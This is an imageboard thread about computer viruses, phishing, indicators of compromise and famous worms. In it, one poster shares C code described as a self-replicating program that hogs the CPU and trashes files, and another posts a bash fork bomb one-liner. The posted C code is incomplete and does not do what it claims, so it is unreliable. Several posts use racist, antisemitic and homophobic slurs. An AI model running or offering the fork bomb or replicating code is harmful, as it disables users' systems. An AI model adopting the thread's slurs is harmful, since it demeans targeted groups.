Heres a thread to talk about computer viruses

heres a thread to talk about computer viruses

Attached: kot.jpg (124x117, 2K)

Other urls found in this thread:

en.m.wikipedia.org/wiki/Sasser_(computer_worm)
en.m.wikipedia.org/wiki/SQL_Slammer
marc.info/?l=oss-security&m=146853062403622&w=2
threatpost.com/new-formbook-dropper-harbors-persistence/145614/
twitter.com/AnonBabble

What are some IoC (indicators of compromise) that you might be infected with a virus

I wish shit like ICE-9 would be real and we could wipe out the internet.

Are viruses alive?

the "common sense" retards have viruses on their computers all day but think they don't

Attached: 1557436609388.png (420x420, 9K)

i remember when my windows XP (it was a new thing at the time) got infected with the I LOVE YOU virus

1 in 3 people are gay
more than 3 people have posted
so who here is gay?

(You).

HELLO I AM THE POSTER OF THE POST YOUR REPLYING TO AND I WOULD LIKE TO SAY THAT THIS IS EXTREMELY HOMOPHOBIC AND YOUR A RACIST NEO NAZI

Phishing is way more profitable than viruses.

You can't say shit like Nazi or Racist at work I'm afraid I will have to HR your ass and send you to a mandatory diversity course.

Really?

Yeah massively. With a virus you need to get around AV and before that on the PC in question. With phishing you just need to hope the user is dogshit retarded and if you've been outside in the last 5 years you should know how many retards are running around.

i made this program that forks itself endlessly for linux, hogging up all the processor time and stuffing random files with junk data rendering the infected PC useless.

#include
#include
#include
#include
main()
{
unsigned int i = 0, fd = 0;
unsigned char name[] = "replicantXXXXXX";
unsigned char program[] = "replicant";
unsigned char mode[] = "w";
void *nme = name;
unsigned char junk[] = "pickle beet soup ";
void *jnk = junk;
FILE *tmpfile;
void *mde = mode;
void *prgrm = program;
fd = mkstemp(nme);
tmpfile = fdopen(fd, mde);
fclose(tmpfile);
fork();
execve(prgrm, 0, 0);
}

The thing is dont really see myself falling for a phishing scam, where as i've caught a virus before. But considering most of the population is tech illiterate it seems reasonable. Cool, never thought about this before.

Don't underestimate it, the yearly (assumed) damages by phishing attacks are in the billions in the US alone.

Where were you at the time of this?
en.m.wikipedia.org/wiki/Sasser_(computer_worm)

>2004
I was a happy child who liked to play with cables and open broken toys, too young to worry about anything.

Apart from the obvious (ransom demands, unexplained cmd windows popping up), many of the signs are also just indicators that you're running Windows.

Why did Norton go off right after I opened this thread?

I didn't know Norton could detect retards.

>1 in 3 people are gay

Attached: 1518741020582.jpg (387x437, 40K)

It's a joke you absolute turbo kike.

lots of services running, odd network connections, dns queries to strange subdomains, autostart stuff, non-standard tasks, missing local logs, command history that doesn't belong, vampired system processes, hidden partition on hard drive, alternate data streams, shared libraries in the wrong directories

>0000: did this person purchase norton? Y/N

I think 0000 should really be does this user use McAfee
0001 should be yours though.

my guess is norton has no respect for its users just like most av companies.

If it's a good virus you won't ever know it's there. Only the retarded pajeets do shit like make adware and ransom shit. any real programer would know the win32 api and how to hide console windows and easy shit like that.

best way to protect yourself from data exfil is to block all domains in your firewall that you don't connect to. this is a pain though because you have to manually allow the stuff you do use. some sites like youtube use CDN's and they have shit loads of different urls. but it is possible.

:() { : | : &; }; :

Attached: uh.png (1024x638, 224K)

No one on Jow Forums falls for that shit I would presume. Typically they prey on like, literally the old and braindead. Imagine an 80 year old grandma getting a call or email saying she owes all these taxes or some bullshit. Shes just gonna pay it. Especially the callers, they'll threaten as well sometimes. Its fucked and more annoying than people give it credit

I call them bugs, and use Guix, no nigger shit

Same place as when this happened.
en.m.wikipedia.org/wiki/SQL_Slammer

marc.info/?l=oss-security&m=146853062403622&w=2

y write virii when you can fuzz syscalls for exploits?

threatpost.com/new-formbook-dropper-harbors-persistence/145614/

droppers, persistence, what does it all mean?

You just reminded me that a company asked me to help them with a Ransomware because all theirs files are encrypted and they don't have any backup.
I didn't have the motivation so I pretended to be busy with my exams but I will have to try to reverse it (even if I never reversed a ransomware)

lol if it's decent encryption then wtf are you wasting time for kek :DDDDDDDDDDDDDDDDDDDDDD

I know... That's why I pretended to be busy. I don't have any contract with this company, but a professor put me in touch with them because of the ransomware. I'm not familiar with Windows, but I guess I can't expect a ransomware for Linux...

I will probably try during a few days and send a mail like "Oh sorry, I can't guess the private key used by the author of the ransomware, so I can't decrypt your file, try to make backup the next time"...

I once got a virus from installing Minecraft mods on my mums computer.

Yes I was a retarded 13-year-old
>Yes I miss my first Minecraft worlds, dearly.

Attached: 132213123123123123.png (800x756, 744K)

is openbsd not affected by forkbomb?

do viri still exist or are they just superstions boomers, gen x and uneducated millenials are afraid of?